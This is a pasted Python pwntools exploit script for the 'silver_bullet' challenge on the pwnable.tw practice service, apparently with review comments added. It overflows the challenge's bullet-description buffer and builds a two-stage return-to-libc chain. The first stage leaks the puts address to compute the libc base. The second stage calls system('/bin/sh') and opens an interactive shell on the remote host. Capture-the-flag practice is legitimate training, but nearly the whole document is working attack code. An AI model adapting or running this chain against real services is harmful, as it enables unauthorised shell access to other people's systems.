
silver_bullet

finalshare Aug 11th, 2018 77 Never
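import sys
from pwn import *

# LD_PRELOAD mapping that points at the challenge-supplied 32-bit libc.
# NOTE(review): this dict is never handed to process() below, so a local run
# loads whatever libc the system resolves by default; offsets read from
# ./libc_32.so.6 may then not match the running process -- confirm whether
# env=env was intended.
env = {
    "LD_PRELOAD": "./libc_32.so.6",
}

# Symbol table of the supplied libc; main() rebases it once an address is known.
glibc = ELF("./libc_32.so.6")
print(glibc.symbols['system'])  # unrebased offset of system(), printed for reference

context(os='linux', arch='i386', log_level='debug')

GDB = 1   # non-zero: attach gdb to the local process
base = 0  # module-level placeholder; main() does not read it

# Any extra command-line argument selects the remote service; with none, the
# local binary is started with ASLR disabled.
if len(sys.argv) > 1:
    r = remote("chall.pwnable.tw", 10103)
else:
    r = process("./silver_bullet", aslr=False)
    if GDB:
        # Break at a fixed address in the target and continue.
        gdb.attach(r, gdbscript='''
        b* 0x08048A18
        c
        ''')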
def create(des):
    """Choose menu entry 1 and submit ``des`` as the bullet description.

    The description goes out through ``send`` (no newline appended) once the
    prompt has been seen, and the call returns after the service answers with
    its "Good luck !!" acknowledgement.  Uses the module-level tube ``r``.
    """
    prompt = "Give me your description of bullet :"
    acknowledgement = "Good luck !!"

    r.sendline("1")
    r.recvuntil(prompt)
    r.send(des)
    r.recvuntil(acknowledgement)
def powerup(des):
    """Choose menu entry 2 and append ``des`` to the existing description.

    Waits for the "another description" prompt, sends ``des`` without a
    trailing newline, then blocks until the service replies "Enjoy it !".
    Uses the module-level tube ``r``.
    """
    prompt = "Give me your another description of bullet :"
    acknowledgement = "Enjoy it !"

    r.sendline("2")
    r.recvuntil(prompt)
    r.send(des)
    r.recvuntil(acknowledgement)
def beat():
    """Choose menu entry 3 on the module-level tube ``r``.

    Nothing is read back here; callers consume the service's reply themselves.
    """
    menu_choice = "3"
    r.sendline(menu_choice)
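def main():
    """Run the two-stage exchange against the ``silver_bullet`` target.

    Stage one sends a payload whose reply contains four bytes that are read
    as the runtime address of ``puts``; subtracting the ``puts`` offset from
    ``./libc_32.so.6`` gives the libc load base, which is stored in
    ``glibc.address``.  Stage two repeats the same create/powerup/beat
    sequence with addresses resolved from the rebased libc and then switches
    the tube to interactive mode.

    Uses the module-level ``r`` and ``glibc``; returns nothing.

    NOTE(review): every 0x0804.... constant below is a fixed address, so the
    script presumably depends on a non-PIE build of the target, and the base
    calculation is only valid when the remote libc is the same build as the
    local ``./libc_32.so.6`` -- confirm both.
    """
    # --- Stage one: obtain a libc address -------------------------------
    # 47 bytes at creation, then one more byte on the first power-up.  The
    # target's source is not on this page, so the reason for the 47+1 split
    # cannot be checked here.
    create(cyclic(47))
    powerup(cyclic(1))

    payload = "A" * 7
    payload += p32(0x080484A8)  # presumably puts@plt -- TODO confirm
    payload += p32(0x080484F0)  # follow-on address, reused in stage two
    payload += p32(0x0804AFDC)  # presumably the GOT slot of puts -- TODO confirm
    powerup(payload)
    beat()
    beat()

    r.recvuntil("Oh ! You win !!\n")
    puts = u32(r.recv(4))
    # Rebase the ELF object so later symbol and search lookups are absolute.
    glibc.address = puts - glibc.symbols['puts']
    binsh = next(glibc.search('/bin/sh\x00'))

    log.success("BASE: " + hex(glibc.address))
    log.success("SYSTEM: " + hex(glibc.symbols["system"]))
    log.success("/bin/sh: " + hex(binsh))

    # --- Stage two: same sequence with rebased libc addresses -----------
    create(cyclic(47))
    powerup(cyclic(1))

    payload = "A" * 7
    payload += p32(glibc.symbols["system"])
    payload += p32(0x080484F0)
    payload += p32(binsh)
    powerup(payload)
    beat()
    beat()

    r.interactive()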
  64.    
# Script entry point.  The connection/process setup above runs at module
# level, so it happens on import regardless of this guard.
if __name__ == "__main__":
    main()